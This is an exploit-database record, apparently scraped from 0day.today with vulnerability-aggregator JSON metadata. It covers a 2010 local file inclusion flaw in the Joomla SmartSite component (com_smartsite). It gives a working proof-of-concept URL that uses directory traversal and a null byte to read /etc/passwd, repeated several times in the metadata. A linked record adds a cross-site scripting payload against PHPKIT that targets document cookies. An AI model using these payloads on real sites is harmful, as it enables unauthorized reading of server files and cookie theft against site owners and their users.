ID 1337DAY-ID-12029
Type zdt
Reporter AntiSecurity
Modified 2010-04-27T00:00:00
Description
Exploit for php platform in category web applications
===========================================================================
Joomla Component SmartSite com_smartsite Local File Inclusion Vulnerability
===========================================================================
===============================================================================================================
[o] Joomla Component SmartSite Local File Inclusion Vulnerability
Software : com_smartsite
Vendor : http://www.smartsite.su/
Author : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
===============================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_smartsite&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
===============================================================================================================
# 0day.today [2018-02-05] #
{"hash": "21618ff5ccdd80dcfb7e144bb465c8dc76060fde4ad7b0979b7fbc4722c71ae6", "id": "1337DAY-ID-12029", "lastseen": "2018-02-06T01:16:57", "viewCount": 4, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "38c3ae94f2f4ad2460e4a372943e6dde", "key": "href"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "modified"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d9cec762ba2413fb0133a492769595da", "key": "reporter"}, {"hash": "6f2d68597fbd162c56cf21a58a92d7fd", "key": "sourceData"}, {"hash": "4d074ab10f671c662280594d6567afd7", "key": "sourceHref"}, {"hash": "ff26721c100f9c1bbab6692c61d5cf5b", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-02-06T01:16:57"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12029", "SECURITYVULNS:VULN:5954"]}], "modified": "2018-02-06T01:16:57"}, "vulnersScore": -0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/12029", "description": "Exploit for php platform in category web applications", "title": "Joomla Component SmartSite com_smartsite Local File Inclusion", "history": [{"bulletin": {"hash": "3c3236e923d532254722e0235803d38985b55272f7073d577c70f6cfb742be6e", "id": "1337DAY-ID-12029", "lastseen": "2016-04-20T01:45:24", "enchantments": {"score": {"value": 2.9, "modified": "2016-04-20T01:45:24"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "modified"}, {"hash": "00458eb42a909ab0e2665d3ee13f6d17", "key": "sourceHref"}, {"hash": "0858595cc2c392a6f02a3ad26afc0b3d", "key": "href"}, {"hash": "ff26721c100f9c1bbab6692c61d5cf5b", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "72229e38f198f643e691a98abf330d39", "key": "published"}, {"hash": "d9cec762ba2413fb0133a492769595da", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3d769edb9922521cf981e8831d1d70da", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/12029", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "Joomla Component SmartSite com_smartsite Local File Inclusion", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================================\r\nJoomla Component SmartSite com_smartsite Local File Inclusion Vulnerability\r\n===========================================================================\r\n\r\n===============================================================================================================\r\n \r\n \r\n [o] Joomla Component SmartSite Local File Inclusion Vulnerability\r\n \r\n Software : com_smartsite\r\n Vendor : http://www.smartsite.su/\r\n Author : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]\r\n Contact : public[at]antisecurity[dot]org\r\n Home : http://antisecurity.org/\r\n \r\n \r\n===============================================================================================================\r\n \r\n \r\n [o] Exploit\r\n \r\n http://localhost/[path]/index.php?option=com_smartsite&controller=[LFI]\r\n \r\n \r\n [o] PoC\r\n \r\n http://localhost/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00\r\n \r\n \r\n===============================================================================================================\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2010-04-27T00:00:00", "references": [], "reporter": "AntiSecurity", "modified": "2010-04-27T00:00:00", "href": "http://0day.today/exploit/description/12029"}, "lastseen": "2016-04-20T01:45:24", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================================\r\nJoomla Component SmartSite com_smartsite Local File Inclusion Vulnerability\r\n===========================================================================\r\n\r\n===============================================================================================================\r\n \r\n \r\n [o] Joomla Component SmartSite Local File Inclusion Vulnerability\r\n \r\n Software : com_smartsite\r\n Vendor : http://www.smartsite.su/\r\n Author : AntiSecurity [ s4va NoGe Vrs-hCk OoN_BoY Paman zxvf ]\r\n Contact : public[at]antisecurity[dot]org\r\n Home : http://antisecurity.org/\r\n \r\n \r\n===============================================================================================================\r\n \r\n \r\n [o] Exploit\r\n \r\n http://localhost/[path]/index.php?option=com_smartsite&controller=[LFI]\r\n \r\n \r\n [o] PoC\r\n \r\n http://localhost/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00\r\n \r\n \r\n===============================================================================================================\r\n\r\n\n\n# 0day.today [2018-02-05] #", "published": "2010-04-27T00:00:00", "references": [], "reporter": "AntiSecurity", "modified": "2010-04-27T00:00:00", "href": "https://0day.today/exploit/description/12029"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "http://www.example.com/include.php?path=login/login.php&error=<script>alert(document.Cookie)</script>\r\n\r\nDiscovered by BadNet !!!!\r\n", "modified": "2006-03-29T00:00:00", "published": "2006-03-29T00:00:00", "id": "SECURITYVULNS:DOC:12029", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12029", "title": "XSS in PHPKIT Version 1.6.03", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-03-29T00:00:00", "published": "2006-03-29T00:00:00", "id": "SECURITYVULNS:VULN:5954", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5954", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}